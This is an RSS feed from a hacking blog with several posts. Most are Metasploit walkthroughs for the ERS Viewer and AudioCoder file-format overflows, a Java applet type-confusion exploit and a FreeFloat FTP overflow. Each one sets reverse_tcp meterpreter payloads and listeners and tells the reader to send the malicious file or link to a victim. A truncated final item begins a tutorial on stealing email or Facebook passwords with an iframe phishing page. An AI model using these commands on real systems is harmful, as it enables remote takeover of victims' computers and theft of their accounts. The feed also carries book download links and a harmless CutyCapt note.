<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking Articles</title>
	<atom:link href="http://www.hackingarticles.in/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.hackingarticles.in</link>
	<description>Raj Chandel&#039;s Blog</description>
	<lastBuildDate>Sat, 18 May 2013 11:28:46 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	
		<item>
		<title>Hacking and Securing iOS Applications</title>
		<link>http://www.hackingarticles.in/hacking-and-securing-ios-applications/</link>
		<comments>http://www.hackingarticles.in/hacking-and-securing-ios-applications/#comments</comments>
		<pubDate>Sat, 18 May 2013 11:27:20 +0000</pubDate>
		<dc:creator>Raj Chandel</dc:creator>
				<category><![CDATA[Hacking Books]]></category>

		<guid isPermaLink="false">http://www.hackingarticles.in/?p=8264</guid>
		<description><![CDATA[Download]]></description>
				<content:encoded><![CDATA[<p><img alt="" src="http://i2.wp.com/4.bp.blogspot.com/-6ACp3OStZss/UZdk96cyyXI/AAAAAAAAGQw/0_gRD7wHV-U/s1600/new.jpg?w=620" data-recalc-dims="1" /></p>
<h1><b><a href="http://www.mediafire.com/?9j2a5gkj7j3o69e">Download</a></b></h1>
]]></content:encoded>
			<wfw:commentRss>http://www.hackingarticles.in/hacking-and-securing-ios-applications/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Exploit Remote  Windows PC using ERS Viewer 2011 ERS File Handling Buffer Overflow</title>
		<link>http://www.hackingarticles.in/exploit-remote-windows-pc-using-ers-viewer-2011-ers-file-handling-buffer-overflow/</link>
		<comments>http://www.hackingarticles.in/exploit-remote-windows-pc-using-ers-viewer-2011-ers-file-handling-buffer-overflow/#comments</comments>
		<pubDate>Fri, 10 May 2013 08:21:42 +0000</pubDate>
		<dc:creator>Raj Chandel</dc:creator>
				<category><![CDATA[BackTrack 5 Tutorials]]></category>
		<category><![CDATA[Penetration Testing]]></category>

		<guid isPermaLink="false">http://www.hackingarticles.in/?p=8249</guid>
		<description><![CDATA[This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the functionERM_convert_to_correct_webpath handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested [...]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><span style="color: #000000;">This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the functionERM_convert_to_correct_webpath handles user provided data in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.</span></p>
<h3 style="text-align: justify;"><span style="color: #000000;"><b>Exploit Targets</b></span></h3>
<p style="text-align: justify;"><span style="color: #000000;">ERS Viewer 2011 (v11.04)</span></p>
<h3 style="text-align: justify;"><span style="color: #000000;"><b>Requirement</b></span></h3>
<p style="text-align: justify;"><span style="color: #000000;"><b>Attacker</b>: Backtrack 5</span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b>Victim PC</b>: Windows 7</span></p>
<p style="text-align: justify;"><span style="color: #000000;">Open backtrack terminal type <b>msfconsole</b></span></p>
<p style="text-align: justify;"><img alt="" src="http://i1.wp.com/3.bp.blogspot.com/-Zbk8qccWLyM/UYysUWoKq-I/AAAAAAAAGMw/NM60F2zQUCQ/s1600/1.jpg?w=620" data-recalc-dims="1" /></p>
<p><span style="color: #000000;">Now type <b>use exploit/windows/fileformat/erdas_er_viewer_bof</b></span></p>
<p><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>erdas_er_viewer_bof</b></span>)&gt;<b>set payload windows/meterpreter/reverse_tcp</b></span></p>
<p><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>erdas_er_viewer_bof</b></span>)&gt;<b>set lhost 192.168.0.106</b> (IP of Local Host)</span></p>
<p><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>erdas_er_viewer_bof</b></span>)&gt;<b>exploit</b></span></p>
<p><img alt="" src="http://i2.wp.com/3.bp.blogspot.com/-pxuLruZSqE4/UYysb0zhE7I/AAAAAAAAGM4/sH1Xd-eDmdI/s1600/2.jpg?w=620" data-recalc-dims="1" /></p>
<p><span style="color: #000000;">After we successfully generate the malicious <b>ers</b> File, it will stored on your local computer</span></p>
<p><span style="color: #000000;"><b>/root/.msf4/local/msf.ers</b></span></p>
<p><img alt="" src="http://i1.wp.com/2.bp.blogspot.com/-lSJtjn6dJzY/UYysnCjW1-I/AAAAAAAAGNA/LhAqpf0hVHY/s1600/3.jpg?w=620" data-recalc-dims="1" /></p>
<p style="text-align: justify;"><span style="color: #000000;">Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.</span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b>use exploit/multi/handler</b></span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b>set payload windows/meterpreter/reverse_tcp</b></span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b>set lhost 192.168.0.106</b></span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b>exploit</b></span></p>
<p style="text-align: justify;"><span style="color: #000000;">Now send your <b>msf.ers</b> files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.</span></p>
<p style="text-align: justify;"><img alt="" src="http://i0.wp.com/1.bp.blogspot.com/-Cyv5ELHlx5Q/UYysybAQ7iI/AAAAAAAAGNI/_rTomo8AZ7c/s1600/4.jpg?w=620" data-recalc-dims="1" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hackingarticles.in/exploit-remote-windows-pc-using-ers-viewer-2011-ers-file-handling-buffer-overflow/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hack Windows PC using AudioCoder .M3U Buffer Overflow</title>
		<link>http://www.hackingarticles.in/hack-windows-pc-using-audiocoder-m3u-buffer-overflow/</link>
		<comments>http://www.hackingarticles.in/hack-windows-pc-using-audiocoder-m3u-buffer-overflow/#comments</comments>
		<pubDate>Tue, 07 May 2013 12:11:47 +0000</pubDate>
		<dc:creator>Raj Chandel</dc:creator>
				<category><![CDATA[BackTrack 5 Tutorials]]></category>
		<category><![CDATA[Kali Linux]]></category>
		<category><![CDATA[Penetration Testing]]></category>

		<guid isPermaLink="false">http://www.hackingarticles.in/?p=8228</guid>
		<description><![CDATA[This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution with the privileges of the user running AudioCoder. This module has been tested successfully on AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1. Exploit Targets Audio Code 0.8.18 Requirement Attacker: Backtrack 5 [...]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><span style="color: #000000;">This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution with the privileges of the user running AudioCoder. This module has been tested successfully on AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.</span></p>
<h3 style="text-align: justify;"><span style="color: #000000;"><b>Exploit Targets</b></span></h3>
<p style="text-align: justify;"><span style="color: #000000;">Audio Code 0.8.18</span></p>
<h3 style="text-align: justify;"><span style="color: #000000;"><b>Requirement</b></span></h3>
<p><span style="color: #000000;"><b>Attacker</b>: Backtrack 5</span></p>
<p><span style="color: #000000;"><b>Victim PC</b>: Windows 7</span></p>
<p><span style="color: #000000;">Open backtrack terminal type <b>msfconsole</b></span></p>
<p><img alt="" src="http://i2.wp.com/3.bp.blogspot.com/-g4xO57ngRUk/UYu-Q391FqI/AAAAAAAAGMI/BSNlLpUfglo/s1600/1.jpg?w=620" data-recalc-dims="1" /></p>
<p style="text-align: justify;"><span style="color: #000000;">Now type <b>use exploit/windows/fileformat/audio_coder_m3u</b></span></p>
<p style="text-align: justify;"><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>audio_coder_m3u</b></span>)&gt;<b>set payload windows/meterpreter/reverse_tcp</b></span></p>
<p style="text-align: justify;"><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>audio_coder_m3u</b></span>)&gt;<b>set lhost 192.168.1.3</b> (IP of Local Host)<b></b></span></p>
<p style="text-align: justify;"><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>audio_coder_m3u</b></span>)&gt;<b>exploit</b></span></p>
<p style="text-align: justify;"><img alt="" src="http://i1.wp.com/4.bp.blogspot.com/-_wPZ4rb_cIk/UYu-WGg7wVI/AAAAAAAAGMQ/NhDcRwrm5eM/s1600/2.jpg?w=620" data-recalc-dims="1" /></p>
<p><span style="color: #000000;">After we successfully generate the malicious <b>m3u</b> File, it will stored on your local computer</span></p>
<p><span style="color: #000000;"><b>/root/.msf4/local/msf.m3u</b></span></p>
<p><img alt="" src="http://i1.wp.com/4.bp.blogspot.com/-oEOwE-WijUw/UYu-eMzPgnI/AAAAAAAAGMY/epot5p3K7k4/s1600/3.jpg?w=620" data-recalc-dims="1" /></p>
<p style="text-align: justify;"><span style="color: #000000;">Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.</span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b>use exploit/multi/handler</b></span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b>set payload windows/meterpreter/reverse_tcp</b></span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b>set lhost 192.168.1.3</b></span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b>exploit</b></span></p>
<p style="text-align: justify;"><span style="color: #000000;">Now send your <b>msf.m3u</b> files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.</span></p>
<p style="text-align: justify;"><span style="color: #000000;"> <img alt="" src="http://i1.wp.com/2.bp.blogspot.com/-g5lUhpirL8Y/UYjtnyL8GwI/AAAAAAAAGKQ/s7QWQrWFY5A/s1600/5.jpg?w=620" data-recalc-dims="1" /></span></p>
<p style="text-align: justify;"><img alt="" src="http://i2.wp.com/4.bp.blogspot.com/-8Xt7PvVJi8Y/UYu-uicJQII/AAAAAAAAGMg/G6z8---yWZg/s1600/4.jpg?w=620" data-recalc-dims="1" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hackingarticles.in/hack-windows-pc-using-audiocoder-m3u-buffer-overflow/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>iOS Hacker&#8217;s Handbook</title>
		<link>http://www.hackingarticles.in/ios-hackers-handbook/</link>
		<comments>http://www.hackingarticles.in/ios-hackers-handbook/#comments</comments>
		<pubDate>Fri, 03 May 2013 07:55:40 +0000</pubDate>
		<dc:creator>Raj Chandel</dc:creator>
				<category><![CDATA[Hacking Books]]></category>

		<guid isPermaLink="false">http://www.hackingarticles.in/?p=8213</guid>
		<description><![CDATA[Download]]></description>
				<content:encoded><![CDATA[<p><img alt="" src="http://i1.wp.com/2.bp.blogspot.com/-NEaG4ppZpvA/UYNrOGWiWYI/AAAAAAAAGJo/eoJhI8_tzLU/s1600/ios+hacker.jpg?w=620" data-recalc-dims="1" /></p>
<h1><b><a href="http://www.mediafire.com/?bkcl4h099cvksvx">Download</a></b></h1>
]]></content:encoded>
			<wfw:commentRss>http://www.hackingarticles.in/ios-hackers-handbook/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>CutyCapt &#8211; A Qt WebKit Web Page Rendering Capture Utility</title>
		<link>http://www.hackingarticles.in/cutycapt-a-qt-webkit-web-page-rendering-capture-utility/</link>
		<comments>http://www.hackingarticles.in/cutycapt-a-qt-webkit-web-page-rendering-capture-utility/#comments</comments>
		<pubDate>Fri, 03 May 2013 07:33:31 +0000</pubDate>
		<dc:creator>Raj Chandel</dc:creator>
				<category><![CDATA[Hacking Tools]]></category>
		<category><![CDATA[Kali Linux]]></category>
		<category><![CDATA[Others]]></category>

		<guid isPermaLink="false">http://www.hackingarticles.in/?p=8209</guid>
		<description><![CDATA[CutyCapt is a small cross-platform command-line utility to capture WebKit&#8217;s rendering of a web page into a variety of vector and bitmap formats, including SVG, PDF, PS, PNG, JPEG, TIFF, GIF, and BMP First download the cutycapt from here Open your cutycapt from command prompt and type following command CutyCapt –url=http://www.example.com –out=anyfile.pdf (Convert in PDF [...]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><span style="color: #000000;">CutyCapt is a small cross-platform command-line utility to capture WebKit&#8217;s rendering of a web page into a variety of vector and bitmap formats, including SVG, PDF, PS, PNG, JPEG, TIFF, GIF, and BMP</span></p>
<p style="text-align: justify;"><span style="color: #000000;">First download the cutycapt from</span> <strong><a href="http://cutycapt.sourceforge.net/">here</a></strong></p>
<p><span style="color: #000000;">Open your cutycapt from command prompt and type following command</span></p>
<p><span style="color: #000000;"><b>CutyCapt –url=http://www.example.com –out=anyfile.pdf (Convert in PDF Format)</b></span></p>
<p><span style="color: #000000;"><b></b><b>CutyCapt –url=http://www.example.com –out=anyfile.jpg (Convert in Image File)</b></span></p>
<p><img alt="" src="http://i0.wp.com/3.bp.blogspot.com/-UREgpMBfGk8/UYNm7Qx5SiI/AAAAAAAAGJQ/Smc3c9f4CAQ/s1600/1.jpg?w=620" data-recalc-dims="1" /></p>
<h3 style="text-align: justify;"><span style="color: #000000;"><b>In Kali Linux</b></span></h3>
<p style="text-align: justify;"><span style="color: #000000;">Open your kali linux terminal and type</span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b>CutyCapt –url=http://www.example.com –out=anyfile.pdf (To Convert in PDF Format)</b></span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b></b><b>CutyCapt –url=http://www.example.com –out=anyfile.jpg (To Convert in Image File)</b></span></p>
<p style="text-align: justify;"><img alt="" src="http://i0.wp.com/4.bp.blogspot.com/--foTHW2A_uQ/UYNnFxZncbI/AAAAAAAAGJY/9piW94mL12g/s1600/ka.jpg?w=620" data-recalc-dims="1" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hackingarticles.in/cutycapt-a-qt-webkit-web-page-rendering-capture-utility/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows Forensics Analysis Toolkit</title>
		<link>http://www.hackingarticles.in/windows-forensics-analysis-toolkit/</link>
		<comments>http://www.hackingarticles.in/windows-forensics-analysis-toolkit/#comments</comments>
		<pubDate>Tue, 30 Apr 2013 15:02:24 +0000</pubDate>
		<dc:creator>Raj Chandel</dc:creator>
				<category><![CDATA[Hacking Books]]></category>

		<guid isPermaLink="false">http://www.hackingarticles.in/?p=8197</guid>
		<description><![CDATA[Download]]></description>
				<content:encoded><![CDATA[<p><img alt="" src="http://i2.wp.com/4.bp.blogspot.com/-cE2l6wLxEa0/UX_cC_xE04I/AAAAAAAAGI8/zTyRjUzwTeM/s1600/forensics.jpg?w=620" data-recalc-dims="1" /></p>
<h1><b><a href="http://www.mediafire.com/?q9vylwwfyq8zyig">Download</a></b></h1>
]]></content:encoded>
			<wfw:commentRss>http://www.hackingarticles.in/windows-forensics-analysis-toolkit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Best of JAVA Hacking Exploit</title>
		<link>http://www.hackingarticles.in/best-of-java-hacking-exploit/</link>
		<comments>http://www.hackingarticles.in/best-of-java-hacking-exploit/#comments</comments>
		<pubDate>Mon, 29 Apr 2013 13:34:47 +0000</pubDate>
		<dc:creator>Raj Chandel</dc:creator>
				<category><![CDATA[Best of Hacking]]></category>
		<category><![CDATA[Penetration Testing]]></category>

		<guid isPermaLink="false">http://www.hackingarticles.in/?p=7121</guid>
		<description><![CDATA[Java Applet Reflection Type Confusion Remote Code Execution Java CMM Remote Code Execution Java Applet Method Handle Remote Code Execution Java Applet AverageRangeStatisticImpl Remote Code Execution Java Applet JMX Remote Code Execution Java Applet JAX-WS Remote Code Execution Java 7 Applet Remote Code Execution Java Applet Field Bytecode Verifier Cache Remote Code Execution Java Applet [...]]]></description>
				<content:encoded><![CDATA[<p><strong><a title="" href="http://www.hackingarticles.in/hack-windows-linux-or-mac-pc-using-java-applet-reflection-type-confusion-remote-code-execution/" rel="bookmark">Java Applet Reflection Type Confusion Remote Code Execution</a></strong></p>
<p><strong><a title="" href="http://www.hackingarticles.in/hack-windows-pc-using-java-cmm-remote-code-execution/" rel="bookmark">Java CMM Remote Code Execution</a></strong></p>
<p><strong><a title="Permanent Link: Attacking on Windows, Linux or MAC PC using Java Applet Method Handle Remote Code Execution" href="http://www.hackingarticles.in/attacking-on-windows-linux-or-mac-pc-using-java-applet-method-handle-remote-code-execution/" rel="bookmark">Java Applet Method Handle Remote Code Execution</a></strong></p>
<p><strong><a title="Permanent Link: Hack Windows, Linux or MAC PC using Java Applet AverageRangeStatisticImpl Remote Code Execution" href="http://www.hackingarticles.in/hack-windows-linux-or-mac-pc-using-java-applet-averagerangestatisticimpl-remote-code-execution/" rel="bookmark">Java Applet AverageRangeStatisticImpl Remote Code Execution</a></strong></p>
<p><strong><a title="Permanent Link: Hack Windows, Linux or MAC PC using Java Applet JMX Remote Code Execution" href="http://www.hackingarticles.in/hack-windows-linux-or-mac-pc-using-java-applet-jmx-remote-code-execution/" rel="bookmark">Java Applet JMX Remote Code Execution</a></strong></p>
<p><strong><a href="http://www.hackingarticles.in/hack-remote-windows-or-linux-pc-using-java-applet-jax-ws-remote-code-execution/">Java Applet JAX-WS Remote Code Execution</a></strong></p>
<p><strong><a href="http://www.hackingarticles.in/hack-remote-windows-or-linux-pc-using-java-7-applet-remote-code-execution/">Java 7 Applet Remote Code Execution</a></strong></p>
<p><strong><a href="http://www.hackingarticles.in/hack-remote-pc-using-java-applet-field-bytecode-verifier-cache-remote-code-execution/">Java Applet Field Bytecode Verifier Cache Remote Code Execution</a></strong></p>
<p><strong><a href="http://www.hackingarticles.in/how-to-hack-remote-victim-pc-with-java-applet-rhino-script/">Java Applet Rhino Script Engine Remote Code Execution</a></strong></p>
<p><strong><a href="http://www.hackingarticles.in/how-to-attack-on-remote-pc-through-sun-java-web-start-execution/">Sun Java Web Start BasicServiceImpl Code Execution</a></strong></p>
<p><strong><a href="http://www.hackingarticles.in/hack-remote-pc-with-sun-java-applet2classloader-remote-code-execution/">Sun Java Applet2ClassLoader Remote Code Execution</a></strong></p>
<p><strong><a href="http://www.hackingarticles.in/hack-pc-in-lan-with-sun-java-runtime-buffer-overflow-attack/">Sun Java Runtime New Plugin docbase Buffer Overflow</a></strong></p>
<p><a href="http://www.hackingarticles.in/hacking-with-java-rmiconnectionimpl-deserialization-privilege-escalation-exploit/"><strong>Java RMIConnectionImpl Deserialization Privilege Escalation</strong></a></p>
<p><a href="http://www.hackingarticles.in/hack-remote-pc-with-java-trusted-chain-method/"><strong>Java Statement.invoke() Trusted Method Chain Privilege Escalation</strong></a></p>
<p><a href="http://www.hackingarticles.in/hack-remote-pc-with-java-atomicreferencearray-type-violation-vulnerability/"><strong>Java AtomicReferenceArray Type Violation Vulnerability</strong></a></p>
<p><a href="http://www.hackingarticles.in/hack-remote-pc-using-sun-java-command-line-injection/"><strong>Sun Java Web Start Plugin Command Line Argument Injection</strong></a></p>
<p><a href="http://www.hackingarticles.in/hack-windows-pc-with-java-mixersequencer-object-gm_song-structure-handling-vulnerability/"><strong>Java MixerSequencer Object GM_Song Structure Handling Vulnerability</strong></a></p>
<p><a href="http://www.hackingarticles.in/hack-remote-pc-with-sun-java-jre-awt-setdifficm-buffer-overflow/"><strong>Sun Java JRE AWT setDiffICM Buffer Overflow</strong></a></p>
<p><a href="http://www.hackingarticles.in/hack-remote-windows-pc-using-sun-java-calendar-deserialization-privilege-escalation/"><strong>Sun Java Calendar Deserialization Privilege Escalation</strong></a></p>
<p><a href="http://www.hackingarticles.in/windows-signed-applet-method/"><strong>Java Signed Applet Social Engineering Code Execution</strong></a></p>
<p><a href="http://www.hackingarticles.in/hack-remote-windows-xp-using-sun-java-web-start-plugin-command-line-argument-injection/"><strong>Sun Java Web Start Plugin Command Line Argument Injection</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hackingarticles.in/best-of-java-hacking-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hack Remote Windows, Linux or MAC PC using Java Applet Reflection Type Confusion Remote Code Execution</title>
		<link>http://www.hackingarticles.in/hack-windows-linux-or-mac-pc-using-java-applet-reflection-type-confusion-remote-code-execution/</link>
		<comments>http://www.hackingarticles.in/hack-windows-linux-or-mac-pc-using-java-applet-reflection-type-confusion-remote-code-execution/#comments</comments>
		<pubDate>Sun, 28 Apr 2013 08:01:12 +0000</pubDate>
		<dc:creator>Raj Chandel</dc:creator>
				<category><![CDATA[BackTrack 5 Tutorials]]></category>
		<category><![CDATA[Penetration Testing]]></category>

		<guid isPermaLink="false">http://www.hackingarticles.in/?p=8179</guid>
		<description><![CDATA[This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to [...]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><span style="color: #000000;">This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.</span></p>
<h4 style="text-align: justify;"><span style="color: #000000;"><b>Exploit Targets</b></span></h4>
<p style="text-align: justify;"><span style="color: #000000;">Java 7 Update 17</span></p>
<p style="text-align: justify;"><span style="color: #000000;">Windows PC</span></p>
<p style="text-align: justify;"><span style="color: #000000;">Linux PC</span></p>
<p style="text-align: justify;"><span style="color: #000000;">MAC OS X PC</span></p>
<h4 style="text-align: justify;"><span style="color: #000000;"><b>Requirement</b></span></h4>
<p style="text-align: justify;"><span style="color: #000000;"><b>Attacker</b>: Backtrack 5</span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b>Victim PC</b>: Windows 7</span></p>
<p style="text-align: justify;"><span style="color: #000000;">Open backtrack terminal type <b>msfconsole</b></span></p>
<p style="text-align: justify;"><img alt="" src="http://i1.wp.com/3.bp.blogspot.com/-XU_fulEKILk/UXzVfFxnQ-I/AAAAAAAAGIM/gR4zg5f63wo/s1600/1.jpg?w=620" data-recalc-dims="1" /></p>
<p><span style="color: #000000;">Now type <b>use exploit/windows/browser/java_jre17_reflection_types</b></span></p>
<p><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>java_jre17_reflection_types</b></span>)&gt;<b>set lhost 192.168.0.106</b> (IP of Local Host)</span></p>
<p><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>java_jre17_reflection_types</b></span>)&gt;<b>set target 1</b></span></p>
<p><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>java_jre17_reflection_types</b></span>)&gt;<b>set srvhost 192.168.0.106</b> (This must be an address on the local</span></p>
<p><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>java_jre17_reflection_types</b></span>)&gt;<b>set payload windows/meterpreter/reverse_tcp</b></span></p>
<p><span style="color: #000000;">machine)</span></p>
<p><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>java_jre17_reflection_types</b></span>)&gt;<b>exploit</b></span></p>
<p><img alt="" src="http://i2.wp.com/1.bp.blogspot.com/-V7tQEO-BqFQ/UXzVpRtcoPI/AAAAAAAAGIU/SxA56ci4vr8/s1600/2.jpg?w=620" data-recalc-dims="1" /></p>
<p><span style="color: #000000;">Now an URL you should give to your victim</span> <span style="color: #3366ff;"><strong>http://192.168.1.0.106:8080/Mt7fUKs955I</strong></span><b></b></p>
<p style="text-align: justify;"><span style="color: #000000;">When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.</span></p>
<p style="text-align: justify;"><img alt="" src="http://i2.wp.com/3.bp.blogspot.com/-DvblYl_sISw/UXzVw5olOrI/AAAAAAAAGIc/jDrkg2c06ys/s1600/p.jpg?w=620" data-recalc-dims="1" /></p>
<p style="text-align: justify;"><img alt="" src="http://i1.wp.com/1.bp.blogspot.com/-6rA-4xRjP-w/UXzV2AjBbwI/AAAAAAAAGIk/g-e5YRkrKYs/s1600/3.jpg?w=620" data-recalc-dims="1" /></p>
<p style="text-align: justify;"><span style="color: #000000;">Now you have access to the victims PC. Use “<strong>Sessions -l</strong>” and the Session number to connect to the session. And Now Type “<strong>sessions -i ID</strong>“ </span></p>
<p style="text-align: justify;"><img alt="" src="http://i0.wp.com/4.bp.blogspot.com/-vEcl9n1nRJA/UXzV9c2ZW3I/AAAAAAAAGIs/f7Zq2JY03jQ/s1600/4.jpg?w=620" data-recalc-dims="1" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hackingarticles.in/hack-windows-linux-or-mac-pc-using-java-applet-reflection-type-confusion-remote-code-execution/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hack Remote PC using Free Float FTP Server USER Command Buffer Overflow</title>
		<link>http://www.hackingarticles.in/hack-remote-pc-using-free-float-ftp-server-user-command-buffer-overflow/</link>
		<comments>http://www.hackingarticles.in/hack-remote-pc-using-free-float-ftp-server-user-command-buffer-overflow/#comments</comments>
		<pubDate>Sat, 27 Apr 2013 10:52:27 +0000</pubDate>
		<dc:creator>Raj Chandel</dc:creator>
				<category><![CDATA[BackTrack 5 Tutorials]]></category>
		<category><![CDATA[Penetration Testing]]></category>

		<guid isPermaLink="false">http://www.hackingarticles.in/?p=8172</guid>
		<description><![CDATA[Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted &#8216;USER&#8217; command, a remote attacker can potentially have an unspecified impact. Exploit Targets FreeFloat FTP Server Requirement Attacker: Backtrack 5 Victim PC: Windows XP Open backtrack terminal type msfconsole Now [...]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><span style="color: #000000;">Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted &#8216;USER&#8217; command, a remote attacker can potentially have an unspecified impact.</span></p>
<h4 style="text-align: justify;"><span style="color: #000000;"><b>Exploit Targets</b></span></h4>
<p style="text-align: justify;"><span style="color: #000000;">FreeFloat FTP Server</span></p>
<h4 style="text-align: justify;"><span style="color: #000000;"><b>Requirement</b></span></h4>
<p style="text-align: justify;"><span style="color: #000000;"><b>Attacker</b>: Backtrack 5</span></p>
<p style="text-align: justify;"><span style="color: #000000;"><b>Victim PC</b>: Windows XP</span></p>
<p style="text-align: justify;"><span style="color: #000000;">Open backtrack terminal type <b>msfconsole</b></span></p>
<p style="text-align: justify;"><img alt="" src="http://i0.wp.com/1.bp.blogspot.com/-Ak_lJlS4uuk/UXusj7FiIwI/AAAAAAAAGH0/_oRX1U4-IpE/s1600/1.jpg?w=620" data-recalc-dims="1" /></p>
<p><span style="color: #000000;">Now type <b>use exploit/windows/ftp/freefloatftp_user</b></span></p>
<p><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>freefloatftp_user</b></span>)&gt;<b>set payload windows/meterpreter/reverse_tcp</b></span></p>
<p><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>freefloatftp_user</b></span>)&gt;<b>set lhost 192.168.0.106</b> (IP of Local Host)</span></p>
<p><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>freefloatftp_user</b></span>)&gt;<b>set rhost 192.168.0.110</b> (IP Address of Victim PC)</span></p>
<p><span style="color: #000000;">msf exploit (<span style="color: #800000;"><b>freefloatftp_user</b></span>)&gt;<b>exploit</b></span></p>
<p><img alt="" src="http://i2.wp.com/3.bp.blogspot.com/-92nq45H6W3g/UXus2LGofqI/AAAAAAAAGH8/N-fyS7UVyyE/s1600/3.jpg?w=620" data-recalc-dims="1" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hackingarticles.in/hack-remote-pc-using-free-float-ftp-server-user-command-buffer-overflow/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hack Email or Facebook Password using Iframe URI Phishing</title>
		<link>http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/</link>
		<comments>http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/#comments</comments>
		<pubDate>Fri, 26 Apr 2013 06:45:31 +0000</pubDate>
		<dc:creator>Raj Chandel</dc:creator>
				<category><![CDATA[Email Hacking]]></category>

		<guid isPermaLink="false">http://www.hackingarticles.in/?p=8159</guid>
		<description><![CDATA[First of all download Super Phisher and create a Phishing page (How to Create Phishing Page) To get the URL of the phishing page upload the page on any webhost / localhost (XAMPP in my case).  &#60;style&#62; body { margin: 0; overflow: hidden; } &#60;/style&#62; &#60;iframe src=&#8221;url link&#8221; height=&#8221;100%&#8221; width=&#8221;100%&#8221; border=&#8221;no&#8221; frameBorder=&#8221;0&#8243; scrolling=&#8221;auto&#8221; &#62;Iframe Failed&#60;/iframe&#62; Replace [...]]]></description>
